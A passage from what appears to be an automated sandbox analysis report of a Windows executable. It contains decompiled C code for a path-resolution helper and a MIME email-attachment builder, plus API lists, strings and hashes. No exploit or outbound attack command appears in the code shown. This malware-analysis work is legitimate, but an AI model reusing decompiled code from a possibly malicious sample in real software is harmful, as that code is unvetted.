                                                                                                                                                                                                                            													_t64 =  &(_v334.cFileName);
                                                                                                                                                                                                                            													_push(_t64);
                                                                                                                                                                                                                            													L00401324();
                                                                                                                                                                                                                            													_t83 = _t83 + _t64 + 1;
                                                                                                                                                                                                                            													_t93 = _t90;
                                                                                                                                                                                                                            													continue;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										goto L17;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_push(_v12);
                                                                                                                                                                                                                            									_push( &_v595);
                                                                                                                                                                                                                            									_push(_v8);
                                                                                                                                                                                                                            									L0040131C();
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
                                                                                                                                                                                                                            					if(_t84 == 0) {
                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push(0x105);
                                                                                                                                                                                                                            						_push( &_v595);
                                                                                                                                                                                                                            						_push(_v8);
                                                                                                                                                                                                                            						if( *_t84() == 0) {
                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_push(_v12);
                                                                                                                                                                                                                            							_push( &_v595);
                                                                                                                                                                                                                            							_push(_v8);
                                                                                                                                                                                                                            							L0040131C();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L17:
                                                                                                                                                                                                                            				return _v16;
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00406035
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00406046
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,?,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00406076
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004060DA
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001), ref: 0040610F
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5), ref: 00406122
                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000), ref: 0040612F
                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278), ref: 0040613B
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040616F
                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040617B
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 0040619D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 3245196872-1565342463
                                                                                                                                                                                                                            • Opcode ID: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                                                                                                                                                                                            • Instruction ID: 0b7a158813eaac7eeaad4be5227783dc720e21281ab2719b2f6a7295f4a4c489
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B341A272900158AFEB10DBA9CC85BDEB3EDDF44304F1501B7E94AF7282D6389E548B58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E0048C7F4(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				char _v9;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v29;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				char _v37;
                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                            				char _v56;
                                                                                                                                                                                                                            				char _v60;
                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                            				char _v72;
                                                                                                                                                                                                                            				char _v76;
                                                                                                                                                                                                                            				char _v80;
                                                                                                                                                                                                                            				char _v84;
                                                                                                                                                                                                                            				void* _v88;
                                                                                                                                                                                                                            				char _v92;
                                                                                                                                                                                                                            				void* _v96;
                                                                                                                                                                                                                            				char _v100;
                                                                                                                                                                                                                            				char _v104;
                                                                                                                                                                                                                            				char _v108;
                                                                                                                                                                                                                            				void* _v112;
                                                                                                                                                                                                                            				char _v116;
                                                                                                                                                                                                                            				void* _v120;
                                                                                                                                                                                                                            				char _v124;
                                                                                                                                                                                                                            				void* _v128;
                                                                                                                                                                                                                            				char _v132;
                                                                                                                                                                                                                            				char _v136;
                                                                                                                                                                                                                            				char _v140;
                                                                                                                                                                                                                            				intOrPtr _v144;
                                                                                                                                                                                                                            				char _v148;
                                                                                                                                                                                                                            				char _v152;
                                                                                                                                                                                                                            				intOrPtr _v156;
                                                                                                                                                                                                                            				char _v160;
                                                                                                                                                                                                                            				intOrPtr _v164;
                                                                                                                                                                                                                            				intOrPtr _t255;
                                                                                                                                                                                                                            				intOrPtr _t256;
                                                                                                                                                                                                                            				char _t269;
                                                                                                                                                                                                                            				char _t270;
                                                                                                                                                                                                                            				char _t302;
                                                                                                                                                                                                                            				char _t305;
                                                                                                                                                                                                                            				void* _t308;
                                                                                                                                                                                                                            				char _t309;
                                                                                                                                                                                                                            				intOrPtr _t312;
                                                                                                                                                                                                                            				void* _t319;
                                                                                                                                                                                                                            				void* _t331;
                                                                                                                                                                                                                            				void* _t338;
                                                                                                                                                                                                                            				intOrPtr _t343;
                                                                                                                                                                                                                            				void* _t433;
                                                                                                                                                                                                                            				void* _t439;
                                                                                                                                                                                                                            				intOrPtr _t443;
                                                                                                                                                                                                                            				void* _t450;
                                                                                                                                                                                                                            				void* _t475;
                                                                                                                                                                                                                            				intOrPtr _t537;
                                                                                                                                                                                                                            				intOrPtr _t554;
                                                                                                                                                                                                                            				intOrPtr _t559;
                                                                                                                                                                                                                            				intOrPtr _t565;
                                                                                                                                                                                                                            				intOrPtr _t572;
                                                                                                                                                                                                                            				intOrPtr _t610;
                                                                                                                                                                                                                            				intOrPtr _t615;
                                                                                                                                                                                                                            				intOrPtr _t626;
                                                                                                                                                                                                                            				intOrPtr _t627;
                                                                                                                                                                                                                            				void* _t644;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t624 = __esi;
                                                                                                                                                                                                                            				_t623 = __edi;
                                                                                                                                                                                                                            				_t626 = _t627;
                                                                                                                                                                                                                            				_t475 = 0x14;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_t475 = _t475 - 1;
                                                                                                                                                                                                                            				} while (_t475 != 0);
                                                                                                                                                                                                                            				_v16 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				 *[fs:eax] = _t627;
                                                                                                                                                                                                                            				_v29 =  *((char*)(_v16 + 0x60)) == 0;
                                                                                                                                                                                                                            				E004049C0( &_v24);
                                                                                                                                                                                                                            				E004872DC( &_v9,  &_v36,  &_v37);
                                                                                                                                                                                                                            				_t470 =  *_v8;
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_v8 + 0x30))( *[fs:eax], 0x48cf08, _t626, __ebx);
                                                                                                                                                                                                                            				_push(_t626);
                                                                                                                                                                                                                            				_push(0x48cecb);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t627;
                                                                                                                                                                                                                            				_t255 =  *((intOrPtr*)(_v16 + 0x6c));
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t255 + 0x20)) <= 0) {
                                                                                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t255 + 0x2c)) - 1;
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t255 + 0x2c)) <= 1) {
                                                                                                                                                                                                                            						_t256 =  *0x49db94; // 0x47a624
                                                                                                                                                                                                                            						E00406A70(_t256,  &_v136);
                                                                                                                                                                                                                            						_v56 = _v136;
						_v52 = 0xb;
						E0047F338(_v8, _t470,  &_v56, 5, __edi, __esi, 0);
						__eflags = _v9 - 2;
						if(_v9 != 2) {
							 *((intOrPtr*)( *_v8 + 0xac))();
						} else {
							_t269 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x34)))) + 0x14))() - 1;
							__eflags = _t269;
							if(_t269 >= 0) {
								_t270 = _t269 + 1;
								__eflags = _t270;
								_v44 = _t270;
								_v20 = 0;
								do {
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x34)))) + 0xc))();
									E00404EE0(_v144, 1, 1,  &_v140);
									E00404DCC(_v140, 0x48d22c);
									if(__eflags != 0) {
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x34)))) + 0xc))();
										E0048746C(_v164,  *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x34)))),  &_v160, _t623, _t624);
										 *((intOrPtr*)( *_v8 + 0x7c))();
									} else {
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x34)))) + 0xc))();
										E0048746C(_v156,  *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x34)))),  &_v152, _t623, _t624);
										E00404CCC( &_v148, _v152, 0x48d22c);
										 *((intOrPtr*)( *_v8 + 0x7c))();
									}
									_v20 = _v20 + 1;
									_t238 =  &_v44;
									 *_t238 = _v44 - 1;
									__eflags =  *_t238;
								} while ( *_t238 != 0);
							}
						}
					} else {
						 *((intOrPtr*)( *_v8 + 0x7c))();
						 *((intOrPtr*)( *_v8 + 0x7c))();
						_t302 = E0041B9E8( *((intOrPtr*)(_v16 + 0x6c))) - 1;
						__eflags = _t302;
						if(_t302 >= 0) {
							_t305 = _t302 + 1;
							__eflags = _t305;
							_v44 = _t305;
							_v20 = 0;
							do {
								_t308 = E0048E8AC( *((intOrPtr*)(_v16 + 0x6c)), _v20);
								_t554 =  *0x48d78c; // 0x48d7d8
								_t309 = E00403D78(_t308, _t554);
								__eflags = _t309;
								if(_t309 != 0) {
									 *((intOrPtr*)( *_v8 + 0x7c))();
									_t312 =  *0x49db94; // 0x47a624
									E00406A70(_t312,  &_v132);
									_v56 = _v132;
									_v52 = 0xb;
									E0047F338(_v8, _t470,  &_v56, 5, _t623, _t624, 0);
									_t319 = E0048E8AC( *((intOrPtr*)(_v16 + 0x6c)), _v20);
									_t559 =  *0x48d78c; // 0x48d7d8
									E0048C554(E00403D9C(_t319, _t559), _t470, _t623, _t624, _t626);
								}
								_v20 = _v20 + 1;
								_t190 =  &_v44;
								 *_t190 = _v44 - 1;
								__eflags =  *_t190;
							} while ( *_t190 != 0);
						}
						 *((intOrPtr*)( *_v8 + 0x7c))();
					}
					goto L50;
				} else {
					if(_v29 == 0) {
						 *((intOrPtr*)( *_v8 + 0xac))();
						__eflags = 0;
						 *((intOrPtr*)( *_v8 + 0x7c))();
					} else {
						 *((intOrPtr*)( *_v8 + 0x7c))();
						 *((intOrPtr*)( *_v8 + 0x7c))();
						if( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x6c)) + 0x28)) <= 0) {
							E00404A58( &_v24, "=_NextPart_2rfkindysadvnqw3nerasdf");
						} else {
							E00404A58( &_v24, "=_NextPart_2relrfksadvnqindyw3nerasdf");
						}
						E00404CCC( &_v48, _v24, 0x48cfac);
						 *((intOrPtr*)( *_v8 + 0x7c))();
					}
					if( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x6c)) + 0x2c)) <= 1) {
						__eflags = _v29;
						if(_v29 != 0) {
							 *((intOrPtr*)( *_v8 + 0x7c))();
							 *((intOrPtr*)( *_v8 + 0x7c))();
							__eflags = 0;
							 *((intOrPtr*)( *_v8 + 0x7c))();
							 *((intOrPtr*)( *_v8 + 0xac))();
						}
					} else {
						 *((intOrPtr*)( *_v8 + 0x7c))();
						 *((intOrPtr*)( *_v8 + 0x7c))();
						 *((intOrPtr*)( *_v8 + 0x7c))();
						_t433 = E0041B9E8( *((intOrPtr*)(_v16 + 0x6c))) - 1;
						if(_t433 >= 0) {
							_v44 = _t433 + 1;
							_v20 = 0;
							do {
								_t439 = E0048E8AC( *((intOrPtr*)(_v16 + 0x6c)), _v20);
								_t610 =  *0x48d78c; // 0x48d7d8
								if(E00403D78(_t439, _t610) != 0) {
									 *((intOrPtr*)( *_v8 + 0x7c))();
									_t443 =  *0x49db94; // 0x47a624
									E00406A70(_t443,  &_v60);
									_v56 = _v60;
									_v52 = 0xb;
									E0047F338(_v8, _t470,  &_v56, 5, _t623, _t624, 0);
									_t450 = E0048E8AC( *((intOrPtr*)(_v16 + 0x6c)), _v20);
									_t615 =  *0x48d78c; // 0x48d7d8
									E0048C554(E00403D9C(_t450, _t615), _t470, _t623, _t624, _t626);
									 *((intOrPtr*)( *_v8 + 0x7c))();
								}
								_v20 = _v20 + 1;
								_t66 =  &_v44;
								 *_t66 = _v44 - 1;
							} while ( *_t66 != 0);
						}
						 *((intOrPtr*)( *_v8 + 0x7c))();
					}
					_t331 = E0041B9E8( *((intOrPtr*)(_v16 + 0x6c))) - 1;
					if(_t331 < 0) {
						L32:
						__eflags = _v29;
						if(_v29 != 0) {
							E00404D40();
							 *((intOrPtr*)( *_v8 + 0x7c))(0x48cfac, _v24, 0x48cfac);
						}
						L50:
						__eflags = 0;
						_pop(_t537);
						 *[fs:eax] = _t537;
						return  *((intOrPtr*)( *_v8 + 0x38))(0x48ced2);
					} else {
						_v44 = _t331 + 1;
						_v20 = 0;
						while(1) {
							_t338 = E0048E8AC( *((intOrPtr*)(_v16 + 0x6c)), _v20);
							_t565 =  *0x48d6cc; // 0x48d718
                                                                                                                                                                                                                            							if(E00403D78(_t338, _t565) != 0) {
                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_v20 = _v20 + 1;
                                                                                                                                                                                                                            							_t157 =  &_v44;
                                                                                                                                                                                                                            							 *_t157 = _v44 - 1;
                                                                                                                                                                                                                            							__eflags =  *_t157;
                                                                                                                                                                                                                            							if( *_t157 != 0) {
                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L51;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t474 = E0048E8AC( *((intOrPtr*)(_v16 + 0x6c)), _v20);
                                                                                                                                                                                                                            						_t343 =  *0x49d860; // 0x47a62c
                                                                                                                                                                                                                            						E00406A70(_t343,  &_v64);
                                                                                                                                                                                                                            						_v56 = _v64;
                                                                                                                                                                                                                            						_v52 = 0xb;
                                                                                                                                                                                                                            						E0047F338(_v8, _t342,  &_v56, 5, _t623, _t624, 0);
                                                                                                                                                                                                                            						if(_v29 != 0) {
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x7c))();
                                                                                                                                                                                                                            							E00404CCC( &_v68, _v24, 0x48cfac);
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x7c))();
                                                                                                                                                                                                                            							E0048E324(_t474,  &_v72);
                                                                                                                                                                                                                            							if(E00404C80(_v72) == 0) {
                                                                                                                                                                                                                            								E0048E390(_t474, "base64");
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							E0048E5E8(_t474,  &_v76);
                                                                                                                                                                                                                            							_t644 = E00404C80(_v76);
                                                                                                                                                                                                                            							if(_t644 == 0) {
                                                                                                                                                                                                                            								E0048E61C(_t474, "attachment");
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							E0048E324(_t474,  &_v80);
                                                                                                                                                                                                                            							E00404DCC(_v80, "base64");
                                                                                                                                                                                                                            							if(_t644 == 0) {
                                                                                                                                                                                                                            								E0048E360(_t474,  &_v84);
                                                                                                                                                                                                                            								if(E00404C80(_v84) == 0) {
                                                                                                                                                                                                                            									E0048E3C4(_t474, "application/octet-stream");
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							E0048E360(_t474,  &_v92);
                                                                                                                                                                                                                            							E00404D40();
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x7c))(0x48d13c, _v92, "Content-Type: ");
                                                                                                                                                                                                                            							E00409E18( *((intOrPtr*)(_t474 + 0x48)),  &_v100);
                                                                                                                                                                                                                            							E00404D40();
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x7c))(0x48d160, _v100, "        name=\"");
                                                                                                                                                                                                                            							E0048E324(_t474,  &_v108);
                                                                                                                                                                                                                            							E00404CCC( &_v104, _v108, "Content-Transfer-Encoding: ");
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x7c))();
                                                                                                                                                                                                                            							E0048E5E8(_t474,  &_v116);
                                                                                                                                                                                                                            							E00404D40();
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x7c))(0x48d13c, _v116, "Content-Disposition: ");
                                                                                                                                                                                                                            							E00409E18( *((intOrPtr*)(_t474 + 0x48)),  &_v124);
                                                                                                                                                                                                                            							E00404D40();
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x7c))(0x48d160, _v124, "        filename=\"");
                                                                                                                                                                                                                            							E00483B3C(_v8, _t474, 0,  *((intOrPtr*)(_t474 + 0x24)), _t623, _t624);
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x7c))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_v28 = E00481384(_v8, 1);
                                                                                                                                                                                                                            						_push(_t626);
                                                                                                                                                                                                                            						_push(0x48cc67);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t627;
                                                                                                                                                                                                                            						E0048E580(E0048E8AC( *((intOrPtr*)(_v16 + 0x6c)), _v20), _t474, _v28, _t623, _t624, 0);
                                                                                                                                                                                                                            						_pop(_t572);
                                                                                                                                                                                                                            						 *[fs:eax] = _t572;
                                                                                                                                                                                                                            						_push(0x48cc6e);
                                                                                                                                                                                                                            						return E0040ECF8( &_v28);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L51:
                                                                                                                                                                                                                            			}







































































                                                                                                                                                                                                                            0x0048ce9a
                                                                                                                                                                                                                            0x0048cea3
                                                                                                                                                                                                                            0x0048cdc6
                                                                                                                                                                                                                            0x0048ccc2
                                                                                                                                                                                                                            0x0048cccc
                                                                                                                                                                                                                            0x0048ccd6
                                                                                                                                                                                                                            0x0048cce4
                                                                                                                                                                                                                            0x0048cce5
                                                                                                                                                                                                                            0x0048cce7
                                                                                                                                                                                                                            0x0048cced
                                                                                                                                                                                                                            0x0048cced
                                                                                                                                                                                                                            0x0048ccee
                                                                                                                                                                                                                            0x0048ccf1
                                                                                                                                                                                                                            0x0048ccf8
                                                                                                                                                                                                                            0x0048cd01
                                                                                                                                                                                                                            0x0048cd06
                                                                                                                                                                                                                            0x0048cd0c
                                                                                                                                                                                                                            0x0048cd11
                                                                                                                                                                                                                            0x0048cd13
                                                                                                                                                                                                                            0x0048cd1f
                                                                                                                                                                                                                            0x0048cd27
                                                                                                                                                                                                                            0x0048cd2c
                                                                                                                                                                                                                            0x0048cd34
                                                                                                                                                                                                                            0x0048cd37
                                                                                                                                                                                                                            0x0048cd43
                                                                                                                                                                                                                            0x0048cd52
                                                                                                                                                                                                                            0x0048cd57
                                                                                                                                                                                                                            0x0048cd62
                                                                                                                                                                                                                            0x0048cd67
                                                                                                                                                                                                                            0x0048cd68
                                                                                                                                                                                                                            0x0048cd6b
                                                                                                                                                                                                                            0x0048cd6b
                                                                                                                                                                                                                            0x0048cd6b
                                                                                                                                                                                                                            0x0048cd6b
                                                                                                                                                                                                                            0x0048ccf8
                                                                                                                                                                                                                            0x0048cd7a
                                                                                                                                                                                                                            0x0048cd7a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0048c863
                                                                                                                                                                                                                            0x0048c867
                                                                                                                                                                                                                            0x0048c8cd
                                                                                                                                                                                                                            0x0048c8d3
                                                                                                                                                                                                                            0x0048c8da
                                                                                                                                                                                                                            0x0048c869
                                                                                                                                                                                                                            0x0048c873
                                                                                                                                                                                                                            0x0048c87d
                                                                                                                                                                                                                            0x0048c88a
                                                                                                                                                                                                                            0x0048c8a3
                                                                                                                                                                                                                            0x0048c88c
                                                                                                                                                                                                                            0x0048c894
                                                                                                                                                                                                                            0x0048c894
                                                                                                                                                                                                                            0x0048c8b3
                                                                                                                                                                                                                            0x0048c8c0
                                                                                                                                                                                                                            0x0048c8c0
                                                                                                                                                                                                                            0x0048c8e7
                                                                                                                                                                                                                            0x0048c9c5
                                                                                                                                                                                                                            0x0048c9c9
                                                                                                                                                                                                                            0x0048c9d5
                                                                                                                                                                                                                            0x0048c9e2
                                                                                                                                                                                                                            0x0048c9e5
                                                                                                                                                                                                                            0x0048c9ec
                                                                                                                                                                                                                            0x0048c9f7
                                                                                                                                                                                                                            0x0048c9f7
                                                                                                                                                                                                                            0x0048c8ed
                                                                                                                                                                                                                            0x0048c8f7
                                                                                                                                                                                                                            0x0048c904
                                                                                                                                                                                                                            0x0048c90e
                                                                                                                                                                                                                            0x0048c91c
                                                                                                                                                                                                                            0x0048c91f
                                                                                                                                                                                                                            0x0048c926
                                                                                                                                                                                                                            0x0048c929
                                                                                                                                                                                                                            0x0048c930
                                                                                                                                                                                                                            0x0048c939
                                                                                                                                                                                                                            0x0048c93e
                                                                                                                                                                                                                            0x0048c94b
                                                                                                                                                                                                                            0x0048c957
                                                                                                                                                                                                                            0x0048c95f
                                                                                                                                                                                                                            0x0048c964
                                                                                                                                                                                                                            0x0048c96c
                                                                                                                                                                                                                            0x0048c96f
                                                                                                                                                                                                                            0x0048c97b
                                                                                                                                                                                                                            0x0048c98a
                                                                                                                                                                                                                            0x0048c98f
                                                                                                                                                                                                                            0x0048c99a
                                                                                                                                                                                                                            0x0048c9a7
                                                                                                                                                                                                                            0x0048c9a7
                                                                                                                                                                                                                            0x0048c9aa
                                                                                                                                                                                                                            0x0048c9ad
                                                                                                                                                                                                                            0x0048c9ad
                                                                                                                                                                                                                            0x0048c9ad
                                                                                                                                                                                                                            0x0048c930
                                                                                                                                                                                                                            0x0048c9c0
                                                                                                                                                                                                                            0x0048c9c0
                                                                                                                                                                                                                            0x0048ca08
                                                                                                                                                                                                                            0x0048ca0b
                                                                                                                                                                                                                            0x0048cc84
                                                                                                                                                                                                                            0x0048cc84
                                                                                                                                                                                                                            0x0048cc88
                                                                                                                                                                                                                            0x0048cca3
                                                                                                                                                                                                                            0x0048ccb0
                                                                                                                                                                                                                            0x0048ccb0
                                                                                                                                                                                                                            0x0048ceb3
                                                                                                                                                                                                                            0x0048ceb3
                                                                                                                                                                                                                            0x0048ceb5
                                                                                                                                                                                                                            0x0048ceb8
                                                                                                                                                                                                                            0x0048ceca
                                                                                                                                                                                                                            0x0048ca11
                                                                                                                                                                                                                            0x0048ca12
                                                                                                                                                                                                                            0x0048ca15
                                                                                                                                                                                                                            0x0048ca1c
                                                                                                                                                                                                                            0x0048ca25
                                                                                                                                                                                                                            0x0048ca2a
                                                                                                                                                                                                                            0x0048ca37
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0048cc78
                                                                                                                                                                                                                            0x0048cc7b
                                                                                                                                                                                                                            0x0048cc7b
                                                                                                                                                                                                                            0x0048cc7b
                                                                                                                                                                                                                            0x0048cc7e
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • application/octet-stream, xrefs: 0048CB15
                                                                                                                                                                                                                            • name=", xrefs: 0048CB50
                                                                                                                                                                                                                            • This is a multi-part message in MIME format, xrefs: 0048C869, 0048CCC2
                                                                                                                                                                                                                            • --=_NextPart_2altrfkindysadvnqw3nerasdf--, xrefs: 0048C9B6
                                                                                                                                                                                                                            • Content-Disposition: , xrefs: 0048CBA5
                                                                                                                                                                                                                            • Content-Type: text/plain, xrefs: 0048C9CB
                                                                                                                                                                                                                            • --=_NextPart_2rfkindysadvnqw3nerasdf--, xrefs: 0048CD70
                                                                                                                                                                                                                            • Content-Type: multipart/alternative; , xrefs: 0048C8ED
                                                                                                                                                                                                                            • --=_NextPart_2altrfkindysadvnqw3nerasdf, xrefs: 0048C94D
                                                                                                                                                                                                                            • =_NextPart_2rfkindysadvnqw3nerasdf, xrefs: 0048C89E
                                                                                                                                                                                                                            • boundary="=_NextPart_2altrfkindysadvnqw3nerasdf", xrefs: 0048C8FA
                                                                                                                                                                                                                            • Content-Transfer-Encoding: 7bit, xrefs: 0048C9D8
                                                                                                                                                                                                                            • attachment, xrefs: 0048CADA
                                                                                                                                                                                                                            • base64, xrefs: 0048CAB8, 0048CAF3
                                                                                                                                                                                                                            • filename=", xrefs: 0048CBD4
                                                                                                                                                                                                                            • --=_NextPart_2rfkindysadvnqw3nerasdf, xrefs: 0048CD15
                                                                                                                                                                                                                            • Content-Transfer-Encoding: , xrefs: 0048CB90
                                                                                                                                                                                                                            • Content-Type: , xrefs: 0048CB21
                                                                                                                                                                                                                            • =_NextPart_2relrfksadvnqindyw3nerasdf, xrefs: 0048C88F
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: boundary="=_NextPart_2altrfkindysadvnqw3nerasdf"$ filename="$ name="$--=_NextPart_2altrfkindysadvnqw3nerasdf$--=_NextPart_2altrfkindysadvnqw3nerasdf--$--=_NextPart_2rfkindysadvnqw3nerasdf$--=_NextPart_2rfkindysadvnqw3nerasdf--$=_NextPart_2relrfksadvnqindyw3nerasdf$=_NextPart_2rfkindysadvnqw3nerasdf$Content-Disposition: $Content-Transfer-Encoding: $Content-Transfer-Encoding: 7bit$Content-Type: $Content-Type: multipart/alternative; $Content-Type: text/plain$This is a multi-part message in MIME format$application/octet-stream$attachment$base64
                                                                                                                                                                                                                            • API String ID: 0-1937961590
                                                                                                                                                                                                                            • Opcode ID: 994b891b018e337bbccbf8f8edbb286f4fa1d5b3e7b2e8b915e2e3685cf950e1
                                                                                                                                                                                                                            • Instruction ID: 43623eaf2d88f5b494d843f775698903c08517ba86c534fb9f8c92edba7d8250
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 994b891b018e337bbccbf8f8edbb286f4fa1d5b3e7b2e8b915e2e3685cf950e1
